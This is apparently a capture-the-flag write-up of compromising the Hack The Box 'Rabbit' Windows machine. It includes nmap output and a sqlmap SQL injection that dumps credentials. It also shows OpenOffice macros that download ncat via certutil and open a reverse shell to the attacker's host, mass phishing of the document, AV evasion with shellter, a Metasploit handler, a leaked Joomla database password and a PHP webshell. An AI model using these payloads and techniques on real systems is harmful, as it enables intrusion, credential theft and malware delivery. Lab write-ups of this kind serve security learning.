25/tcp open smtp Microsoft Exchange smtpd | smtp-commands: Rabbit.htb.local Hello [10.10.14.129], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW, |_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT | smtp-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: RABBIT | DNS_Domain_Name: htb.local | DNS_Computer_Name: Rabbit.htb.local | DNS_Tree_Name: htb.local |_ Product_Version: 6.1.7601 |_ssl-date: 2018-06-27T18:45:56+00:00; +5h00m01s from scanner time. 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 80/tcp open http Microsoft IIS httpd 7.5 |_http-server-header: Microsoft-IIS/7.5 |_http-title: 403 - Forbidden: Access is denied. 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2018-06-27 18:44:58Z) 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 443/tcp open ssl/http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 | ssl-cert: Subject: commonName=Rabbit | Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local | Not valid before: 2017-10-24T17:56:42 |_Not valid after: 2022-10-24T17:56:42 |_ssl-date: 2018-06-27T18:45:57+00:00; +5h00m00s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 |_ SSL2_DES_192_EDE3_CBC_WITH_MD5 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 587/tcp open smtp Microsoft Exchange smtpd | smtp-commands: Rabbit.htb.local Hello [10.10.14.129], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, |_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT | smtp-ntlm-info: | Target_Name: HTB | NetBIOS_Domain_Name: HTB | NetBIOS_Computer_Name: RABBIT | DNS_Domain_Name: htb.local | DNS_Computer_Name: Rabbit.htb.local | DNS_Tree_Name: htb.local |_ Product_Version: 6.1.7601 | ssl-cert: Subject: commonName=Rabbit | Subject Alternative Name: DNS:Rabbit, DNS:Rabbit.htb.local | Not valid before: 2017-10-24T17:56:42 |_Not valid after: 2022-10-24T17:56:42 |_ssl-date: 2018-06-27T18:45:56+00:00; +5h00m00s from scanner time. 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 808/tcp open ccproxy-http? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3306/tcp open mysql MySQL 5.7.19 |_mysql-info: ERROR: Script execution failed (use -d to debug) 5722/tcp open msrpc Microsoft Windows RPC 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 6001/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 6002/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 6003/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 6004/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 6005/tcp open msrpc Microsoft Windows RPC 6006/tcp open msrpc Microsoft Windows RPC 6007/tcp open msrpc Microsoft Windows RPC 6008/tcp open msrpc Microsoft Windows RPC 6010/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 6011/tcp open msrpc Microsoft Windows RPC 6017/tcp open msrpc Microsoft Windows RPC 6142/tcp open msrpc Microsoft Windows RPC 8080/tcp open http Apache httpd 2.4.27 ((Win64) PHP/5.6.31) | http-methods: |_ Potentially risky methods: TRACE |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31 |_http-title: Example 9389/tcp open mc-nmf .NET Message Framing 44668/tcp open msrpc Microsoft Windows RPC 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 50242/tcp open msrpc Microsoft Windows RPC 50246/tcp open msrpc Microsoft Windows RPC 50292/tcp open msrpc Microsoft Windows RPC 50299/tcp open msrpc Microsoft Windows RPC 50327/tcp open msrpc Microsoft Windows RPC 50343/tcp open msrpc Microsoft Windows RPC 50354/tcp open msrpc Microsoft Windows RPC 50363/tcp open msrpc Microsoft Windows RPC 50365/tcp open msrpc Microsoft Windows RPC 50374/tcp open msrpc Microsoft Windows RPC 50387/tcp open msrpc Microsoft Windows RPC 50395/tcp open msrpc Microsoft Windows RPC 50410/tcp open msrpc Microsoft Windows RPC 50422/tcp open msrpc Microsoft Windows RPC 64337/tcp open mc-nmf .NET Message Framing Service Info: Hosts: Rabbit.htb.local, RABBIT; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1
On the complain main page on 10.10.10.71:8080/complain/:
1
Online Complaint Monitoring System (OCMS) is a system operated by the city of Pune, India. A Complaint Management System is one of latest productivity enhancement tools used widely by all organisations wherever there is a need of booking of complaints via operators and analysis of complaints which are made or are pending.
Searching online for exploit on this framework we found a Blind SQLi abuse from an hardcoded admin login (admin:admin123); the default login is not working on the application. We need to register as Customer to get a valid session to perform the attack.
sqlmap -u "http://10.10.10.71:8080/complain/view.php?mod=admin&view=repod&id=plans" --cookie "PHPSESSID=shuv7rnuvj10rds4leqq4of5f6" --dbms mysql --random-agent -p id
We can access the mod=admin even if we registered as Customer.
Now we can dump all data from databases complain, joomla and secret.
From the secret database we got a bunch of credentials:
Unfortunately those credentials do not works on Joomla installation so we tried to login in the Outlook Wep Applicatio (OWA):
Ariel works on OWA and ECP
Kain works on OWA and ECP
Magnus works on OWA and ECP
Raziel is listed as user but we cannot login with those credentials
Dimitri has an email address but he cannot receive mails
From Ariel mailbox we saw that the Administrator changed some software configuration
Now all computers will use Open Office per default but they also deployed Windows Defender and some PowerShell contraints.
In addition we know that the Administrator is waiting for a mail for some TPS reports.
Wrapping all up we can generate a malicious Open Office document that will spawn a reverse shell but we cannot use PowerShell and maybe we need to do some AV evasion for our payload/macro.
We could use the metasploit module exploit/multi/misc/openoffice_document_macro but it will create dropper with powershell to create a meterpreter session so we preferred to build the macro on our own.
We tried to generate our meterpreter shell with msfvenom
and create the macro to download and execute it via SMB with impacket (smbserver.py DODO .)
1 2 3 4
Sub OnLoad Shell("echo Pwned!") Shell("cmd.exe /C net use /D /Y * && cmd.exe /C net use \\10.10.14.38\DODO & call \\10.10.14.38\DODO\dodo.exe") EndSub
Using the created ELF locally (and then remotely) we failed miserably: Windows is detecting the malicious PE.
Windows detected our session and delete the shell. We must focus to get a simple reverse shell.
After a lots of some tries we create a payload to ping our machine and download something using certutil and not PowerShell.
Finally we crafted the ultimate payload:
1 2 3
Sub OnLoad Shell("cmd.exe /C net use /D /Y * && cmd.exe /C certutil.exe -urlcache -split -f ""http://10.10.15.24/ncat.exe"" C:\Users\Public\ncat.exe & C:\Users\Public\ncat.exe 10.10.15.24 443 -e powershell.exe") EndSub
1- Spawn a cmd.exe. 2- Download a portable version of netcat using certutil from our machine (python -m http.server 80). 3- Save the file in C:\Users\Public (some others known paths did not worked). 4- Call the ncat.exe to connect to the listening machine spawing a powershell shell.
Now it’s time to send the malicious odt to someone: When in doubt… ¯_(ツ)_/¯ …use brute force send mails to everyone.
From the OWA we kindly sended the file to everyone suggesting them to enable the macros.
After a while (5-6 mins) we saw a download of the netcat file and the the shell popped as Raziel user! Now we also know who is the right recipient!
Finally we were able to read the Rabbit user flag.
Now we need to upgrade our shell to a meterpreter session and privesc to Administrator but we can’t use powershell since the shell is in the ConstrainedLanguage mode ($ExecutionContext.SessionState.LanguageMode) and we can’t spawn a powershell version 2 (powershell -version 2) to bypass the jail.
We tried to upload a EXE generated with msfvenom but the execution in blocked by the AV so we created a FUD EXE with shellter:
ncat.exe (an EXE that we had in the folder) as base; use you own EXE in real world scenario
enable mode Auto
enable mode Stealth (when you use the Stealth Mode feature you need to set the payload exit function to Thread)
set payload as Meterpreter_Reverse_TCP
set LHOST
set LPORT
upload to machine certutil -urlcache -split -f "http://10.10.15.198/dodo.exe" C:\Users\Public\dodo.exe
set up metasploit listener: use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 3487; set AutoRunScript post/windows/manage/migrate; run -j;
But after some seconds the connection is killed target-side for some reasons (maybe the AV is detecting something in memory). We have to use the constrained shell spawned with netcat.
net user Raziel User name Raziel Full Name Raziel Comment User's comment Country code 000 (System Default) Account active Yes Account expires Never
Password last set 10/29/2017 10:04:44 AM Password expires Never Password changeable 10/30/2017 10:04:44 AM Password required Yes User may change password Yes
Workstations allowed All Logon script User profile Home directory Last logon 8/11/2018 12:00:39 AM
Logon hours allowed All
Local Group Memberships Global Group memberships *Discovery Management *Mailbox Import-Export *Domain Users *Organization Manageme The command completed successfully.
From the Joomla installation we read the user and password of the MySQL service but we weren’t able to find/exploit anything more than what we saw with sqlmap.
1 2 3 4 5 6 7 8 9
type C:\wamp64\www\joomla\configuration.php
public $host = 'localhost'; public $user = 'dbuser'; public $password = 'zLlYCLRmqFMaONwY'; public $db = 'joomla'; public $dbprefix = 'llhe4_'; public $live_site = ''; public $secret = 'QJMwxJmeJP18x25X';
We first focused on searching some SYSTEM/NT services to hijack but from tasklist /V we found that only the Father of All Processes is owned by NT AUTHORITY\SYSTEM.
Since we are interested in the mysql service we headed to C:\wamp64\www where all web-server configurations are stored and started to search for some configuration with root password but we found also a index.old.php.
From this page we saw that exists the alias wordpress.htp.local but it is not present in the Apache www directory. From the man page of tasklist command we saw that system processes return an empty string: so httpd.exe could be runned by the admin user since we didn’t saw an associate user for that process.
We created the wordpress folder in C:\wamp64\www and added the domain to our /etc/hosts file.
We created a PHP file within powershell (echo "<?\necho 'ciao';\n" > dodo.php) but some some reason it didn’t worked (powershell added some strange chars…).
So we wrote and uploaded into Rabbit machine a simple webshell with curl.
1 2
<?php system($_GET["cmd"]);
Now we can easily read the root flag with http http://wordpress.htb.local:8080/index.php\?cmd\="type C:\Users\Administrator\Desktop\root.txt".
